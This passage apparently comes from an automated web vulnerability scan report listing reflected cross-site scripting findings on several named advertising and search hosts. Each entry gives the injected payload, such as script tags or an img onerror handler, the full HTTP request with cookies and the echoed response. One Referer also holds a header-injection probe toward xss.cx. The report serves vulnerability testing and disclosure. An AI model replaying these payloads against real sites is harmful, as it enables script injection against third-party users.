Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=014937087076; mojo3=12309:21584

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 406
Date: Tue, 02 Aug 2011 19:03:15 GMT

<html><body bgcolor=#ffffff leftmargin="0" topmargin="0"><a target="_blank" href="http://clk.atdmt.com/go/341542882/direct;wi.300;hi.250;ai.227560320.184762796;ct.1/01?href=777c2"><script>alert(1)</script>7fa5842055dhttp://altfarm.mediaplex.com/ad/ck/12741-112746-27909-3?mpt=5502339">
...[SNIP]...

2.64. http://altfarm.mediaplex.com/ad/fm/12741-112746-27909-3 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/fm/12741-112746-27909-3

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbc30"><script>alert(1)</script>8af36c94535 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/fm/12741-112746-27909-3?mpt=5502339&mpvc=http://clk.atdmt.com/go/341542882/direct;wi.300;hi.250;ai.227560320.184762796;ct.1/01?href=&bbc30"><script>alert(1)</script>8af36c94535=1 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/D6I/iview/341542882/direct;;wi.300;hi.250/01?click=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=014937087076; mojo3=12309:21584

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 409
Date: Tue, 02 Aug 2011 19:03:15 GMT

<html><body bgcolor=#ffffff leftmargin="0" topmargin="0"><a target="_blank" href="http://clk.atdmt.com/go/341542882/direct;wi.300;hi.250;ai.227560320.184762796;ct.1/01?href=&bbc30"><script>alert(1)</script>8af36c94535=1http://altfarm.mediaplex.com/ad/ck/12741-112746-27909-3?mpt=5502339">
...[SNIP]...

2.65. http://api.bing.com/qsonhs.aspx [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bing.com
Path:   /qsonhs.aspx

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload fe2e6<img%20src%3da%20onerror%3dalert(1)>7810eff62ec was submitted in the q parameter. This input was echoed as fe2e6<img src=a onerror=alert(1)>7810eff62ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /qsonhs.aspx?FORM=ASAPII&q=fe2e6<img%20src%3da%20onerror%3dalert(1)>7810eff62ec HTTP/1.1
Host: api.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/images?FORM=http://xss.cx%3f%0D%0ALocation:%20http://xss.cx/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _SS=SID=DCE97E9AE4B54F1ABFC69B04809D858D; MUID=35C31F230F1247F092803EA5DA627D5A; OrigMUID=35C31F230F1247F092803EA5DA627D5A%2c5ac369b62d9442929082762bbac52a05; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=D=1885705&MS=1885705&AF=http%3a%2f%2fxss.cx%3f%0d%0aLocation%3a%20http%3a%2f%2fxss.cx%2f; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110802

Response

HTTP/1.1 200 OK
Content-Length: 79
Content-Type: application/json; charset=utf-8
X-Akamai-TestID: 057b390240834846b936651a087473e2
Date: Tue, 02 Aug 2011 12:25:11 GMT
Connection: close

{"AS":{"Query":"fe2e6<img src=a onerror=alert(1)>7810eff62ec","FullResults":1}}

2.66. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 4aae1<script>alert(1)</script>e6c7a8db634 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=34aae1<script>alert(1)</script>e6c7a8db634&c2=6034986&c3=SMGU-BNG-001-01-MRT&c4=224940676.225733731.225526980&c5=msnnkdrv0010001607apm&c6= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/msnnkdrv0010001607apm/direct;wi.728;hi.90;ai.224940676.225733731.225526980/01?click=
Cookie: UID=2695e1-80.67.74.150-1312230894

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 10 Aug 2011 12:54:38 GMT
Date: Wed, 03 Aug 2011 12:54:38 GMT
Content-Length: 1303
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"34aae1<script>alert(1)</script>e6c7a8db634", c2:"6034986", c3:"SMGU-BNG-001-01-MRT", c4:"224940676.225733731.225526980", c5:"msnnkdrv0010001607apm", c6:"", c10:"", c15:"", c16:"", r:""});



2.67. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 42c60<script>alert(1)</script>b11310a8a62 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=603498642c60<script>alert(1)</script>b11310a8a62&c3=SMGU-BNG-001-01-MRT&c4=224940676.225733731.225526980&c5=msnnkdrv0010001607apm&c6= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/msnnkdrv0010001607apm/direct;wi.728;hi.90;ai.224940676.225733731.225526980/01?click=
Cookie: UID=2695e1-80.67.74.150-1312230894

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 10 Aug 2011 12:54:38 GMT
Date: Wed, 03 Aug 2011 12:54:38 GMT
Content-Length: 1303
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"603498642c60<script>alert(1)</script>b11310a8a62", c3:"SMGU-BNG-001-01-MRT", c4:"224940676.225733731.225526980", c5:"msnnkdrv0010001607apm", c6:"", c10:"", c15:"", c16:"", r:""});



2.68. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 5b905<script>alert(1)</script>5e1517256ea was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6034986&c3=SMGU-BNG-001-01-MRT5b905<script>alert(1)</script>5e1517256ea&c4=224940676.225733731.225526980&c5=msnnkdrv0010001607apm&c6= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/msnnkdrv0010001607apm/direct;wi.728;hi.90;ai.224940676.225733731.225526980/01?click=
Cookie: UID=2695e1-80.67.74.150-1312230894

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 10 Aug 2011 12:54:38 GMT
Date: Wed, 03 Aug 2011 12:54:38 GMT
Content-Length: 1303
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"6034986", c3:"SMGU-BNG-001-01-MRT5b905<script>alert(1)</script>5e1517256ea", c4:"224940676.225733731.225526980", c5:"msnnkdrv0010001607apm", c6:"", c10:"", c15:"", c16:"", r:""});



2.69. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 9bd46<script>alert(1)</script>7f62247a19d was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6034986&c3=SMGU-BNG-001-01-MRT&c4=224940676.225733731.2255269809bd46<script>alert(1)</script>7f62247a19d&c5=msnnkdrv0010001607apm&c6= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/msnnkdrv0010001607apm/direct;wi.728;hi.90;ai.224940676.225733731.225526980/01?click=
Cookie: UID=2695e1-80.67.74.150-1312230894

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 10 Aug 2011 12:54:38 GMT
Date: Wed, 03 Aug 2011 12:54:38 GMT
Content-Length: 1303
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
-){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"6034986", c3:"SMGU-BNG-001-01-MRT", c4:"224940676.225733731.2255269809bd46<script>alert(1)</script>7f62247a19d", c5:"msnnkdrv0010001607apm", c6:"", c10:"", c15:"", c16:"", r:""});



2.70. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload df6ee<script>alert(1)</script>0abe55f4b8e was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6034986&c3=SMGU-BNG-001-01-MRT&c4=224940676.225733731.225526980&c5=msnnkdrv0010001607apmdf6ee<script>alert(1)</script>0abe55f4b8e&c6= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/msnnkdrv0010001607apm/direct;wi.728;hi.90;ai.224940676.225733731.225526980/01?click=
Cookie: UID=2695e1-80.67.74.150-1312230894

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 10 Aug 2011 12:54:38 GMT
Date: Wed, 03 Aug 2011 12:54:38 GMT
Content-Length: 1303
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"6034986", c3:"SMGU-BNG-001-01-MRT", c4:"224940676.225733731.225526980", c5:"msnnkdrv0010001607apmdf6ee<script>alert(1)</script>0abe55f4b8e", c6:"", c10:"", c15:"", c16:"", r:""});



2.71. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 321b4<script>alert(1)</script>a6b4e81a8c6 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6034986&c3=SMGU-BNG-001-01-MRT&c4=224940676.225733731.225526980&c5=msnnkdrv0010001607apm&c6=321b4<script>alert(1)</script>a6b4e81a8c6 HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/msnnkdrv0010001607apm/direct;wi.728;hi.90;ai.224940676.225733731.225526980/01?click=
Cookie: UID=2695e1-80.67.74.150-1312230894

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 10 Aug 2011 12:54:38 GMT
Date: Wed, 03 Aug 2011 12:54:38 GMT
Content-Length: 1303
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"6034986", c3:"SMGU-BNG-001-01-MRT", c4:"224940676.225733731.225526980", c5:"msnnkdrv0010001607apm", c6:"321b4<script>alert(1)</script>a6b4e81a8c6", c10:"", c15:"", c16:"", r:""});



2.72. http://b3-uk.mookie1.com/2/B3/DM/2010/1@x13 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3-uk.mookie1.com
Path:   /2/B3/DM/2010/1@x13

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c2d6"><script>alert(1)</script>a087e3155d6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B34c2d6"><script>alert(1)</script>a087e3155d6/DM/2010/1@x13? HTTP/1.1
Host: b3-uk.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3-uk.mookie1.com/2/www.Microsoft.com/Three/CHS/Q1/2011/1[TIMESTAMP]@x60?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak4m6x4ADQFu; id=211111708350353; session=1312375058|1312376498; RMFS=011Qob4tU1051iH; NSC_fo1efm_qppm_iuuq=ffffffff09097b8245525d5f4f58455e445a4a423660; Three_CHS_Wraps_Q1_2011

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 13:02:55 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 288
Content-Type: text/html

<A HREF="http://b3-uk.mookie1.com/5c/B34c2d6"><script>alert(1)</script>a087e3155d6/DM/2010/1137682584/x13/default/empty.gif/4d686437616b346d3678344144514675?x" target="_top"><IMG SRC="http://imagenen1
...[SNIP]...

2.73. http://b3-uk.mookie1.com/2/B3/DM/2010/1@x13 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3-uk.mookie1.com
Path:   /2/B3/DM/2010/1@x13

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ba0b"><script>alert(1)</script>f0fbee0a376 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3/DM6ba0b"><script>alert(1)</script>f0fbee0a376/2010/1@x13? HTTP/1.1
Host: b3-uk.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3-uk.mookie1.com/2/www.Microsoft.com/Three/CHS/Q1/2011/1[TIMESTAMP]@x60?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak4m6x4ADQFu; id=211111708350353; session=1312375058|1312376498; RMFS=011Qob4tU1051iH; NSC_fo1efm_qppm_iuuq=ffffffff09097b8245525d5f4f58455e445a4a423660; Three_CHS_Wraps_Q1_2011

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 13:02:58 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 288
Content-Type: text/html

<A HREF="http://b3-uk.mookie1.com/5c/B3/DM6ba0b"><script>alert(1)</script>f0fbee0a376/2010/1430349244/x13/default/empty.gif/4d686437616b346d3678344144514675?x" target="_top"><IMG SRC="http://imagenen1
...[SNIP]...

2.74. http://b3-uk.mookie1.com/2/B3/DM/2010/1@x13 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3-uk.mookie1.com
Path:   /2/B3/DM/2010/1@x13

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54be9"><script>alert(1)</script>d009f030070 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3/DM/201054be9"><script>alert(1)</script>d009f030070/1@x13? HTTP/1.1
Host: b3-uk.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3-uk.mookie1.com/2/www.Microsoft.com/Three/CHS/Q1/2011/1[TIMESTAMP]@x60?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak4m6x4ADQFu; id=211111708350353; session=1312375058|1312376498; RMFS=011Qob4tU1051iH; NSC_fo1efm_qppm_iuuq=ffffffff09097b8245525d5f4f58455e445a4a423660; Three_CHS_Wraps_Q1_2011

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 13:03:00 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 287
Content-Type: text/html

<A HREF="http://b3-uk.mookie1.com/5c/B3/DM/201054be9"><script>alert(1)</script>d009f030070/348511342/x13/default/empty.gif/4d686437616b346d3678344144514675?x" target="_top"><IMG SRC="http://imagenen1.
...[SNIP]...

2.75. http://b3-uk.mookie1.com/2/B3/DM/2010/1@x13 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3-uk.mookie1.com
Path:   /2/B3/DM/2010/1@x13

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cc04"><script>alert(1)</script>4748c177c84 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3/DM/2010/1@x138cc04"><script>alert(1)</script>4748c177c84? HTTP/1.1
Host: b3-uk.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3-uk.mookie1.com/2/www.Microsoft.com/Three/CHS/Q1/2011/1[TIMESTAMP]@x60?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak4m6x4ADQFu; id=211111708350353; session=1312375058|1312376498; RMFS=011Qob4tU1051iH; NSC_fo1efm_qppm_iuuq=ffffffff09097b8245525d5f4f58455e445a4a423660; Three_CHS_Wraps_Q1_2011

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 13:03:03 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 279
Content-Type: text/html

<A HREF="http://b3-uk.mookie1.com/5c/B3/DM/2010/383174214/x138cc04"><script>alert(1)</script>4748c177c84/default/empty.gif/4d686437616b346d3678344144514675?x" target="_top"><IMG SRC="http://imagenen1.
...[SNIP]...

2.76. http://b3-uk.mookie1.com/2/www.three.co.uk/CHS/Weeklywrap/0511/1[TIMESTAMP]@x60 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3-uk.mookie1.com
Path:   /2/www.three.co.uk/CHS/Weeklywrap/0511/1[TIMESTAMP]@x60

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c027"><script>alert(1)</script>7fbe6b87d67 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/www.three.co.uk9c027"><script>alert(1)</script>7fbe6b87d67/CHS/Weeklywrap/0511/1[TIMESTAMP]@x60? HTTP/1.1
Host: b3-uk.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3-uk.mookie1.com/2/www.Microsoft.com/Three/CHS/Q1/2011/1[TIMESTAMP]@x60?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak4m6x4ADQFu; id=211111708350353; session=1312375058|1312376498; RMFS=011Qob4tU1051iH; NSC_fo1efm_qppm_iuuq=ffffffff09097b8245525d5f4f58455e445a4a423660; Three_CHS_Wraps_Q1_2011

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 13:03:00 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html

<A HREF="http://b3-uk.mookie1.com/5c/www.three.co.uk9c027"><script>alert(1)</script>7fbe6b87d67/CHS/Weeklywrap/0511/1[TIMESTAMP]/2000817042/x60/default/empty.gif/4d686437616b346d3678344144514675?x" target="_top">
...[SNIP]...

2.77. http://b3-uk.mookie1.com/2/www.three.co.uk/CHS/Weeklywrap/0511/1[TIMESTAMP]@x60 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3-uk.mookie1.com
Path:   /2/www.three.co.uk/CHS/Weeklywrap/0511/1[TIMESTAMP]@x60

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 972f8"><script>alert(1)</script>32dfd893ce6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/www.three.co.uk/CHS972f8"><script>alert(1)</script>32dfd893ce6/Weeklywrap/0511/1[TIMESTAMP]@x60? HTTP/1.1
Host: b3-uk.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3-uk.mookie1.com/2/www.Microsoft.com/Three/CHS/Q1/2011/1[TIMESTAMP]@x60?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak4m6x4ADQFu; id=211111708350353; session=1312375058|1312376498; RMFS=011Qob4tU1051iH; NSC_fo1efm_qppm_iuuq=ffffffff09097b8245525d5f4f58455e445a4a423660; Three_CHS_Wraps_Q1_2011

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 13:03:03 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html

<A HREF="http://b3-uk.mookie1.com/5c/www.three.co.uk/CHS972f8"><script>alert(1)</script>32dfd893ce6/Weeklywrap/0511/1[TIMESTAMP]/1871139310/x60/default/empty.gif/4d686437616b346d3678344144514675?x" target="_top">
...[SNIP]...

